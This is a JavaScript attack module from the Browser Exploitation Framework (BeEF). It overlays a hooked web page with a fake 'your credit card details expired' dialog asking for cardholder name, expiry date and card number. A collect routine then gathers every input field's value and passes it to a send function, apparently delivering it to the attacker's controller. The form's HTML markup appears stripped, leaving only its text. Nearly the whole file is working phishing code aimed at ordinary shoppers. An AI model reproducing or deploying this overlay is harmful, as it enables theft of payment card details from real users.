/* * Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net * Browser Exploitation Framework (BeEF) - http://beefproject.com * See the file 'doc/COPYING' for copying permission */ beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null); $j(document).attr('title', $j(this).html()); document.body.scroll = 'no'; document.documentElement.style.overflow = 'hidden'; collect = function(){ answer = ""; $j(":input").each(function() { answer += " "+$j(this).attr("name")+":"+$j(this).val(); }); send(answer); } // floating div function writediv() { sneakydiv = document.createElement('div'); sneakydiv.setAttribute('id', 'hax'); sneakydiv.setAttribute('display', 'block'); sneakydiv.setAttribute('style', 'width:60%;position:fixed; top:200px; left:220px; z-index:51;background-color:#FFFFFF;opacity:1;font-family: verdana,arial,helvetica,sans-serif;font-size: small;'); document.body.appendChild(sneakydiv); sneakydiv.innerHTML= '
Your credit card details expired, please enter your new credit card credential to continue shopping-
Changes made to your payment methods will not affect orders you have already placed.
Your Account>

Add a Credit or Debit Card

  Edit your payment method:
Cardholder Name:
Exp. Date: 
Number:

Confirm
'; } writediv(); $j("#confirm").click(function () { $j('#hax').remove(); });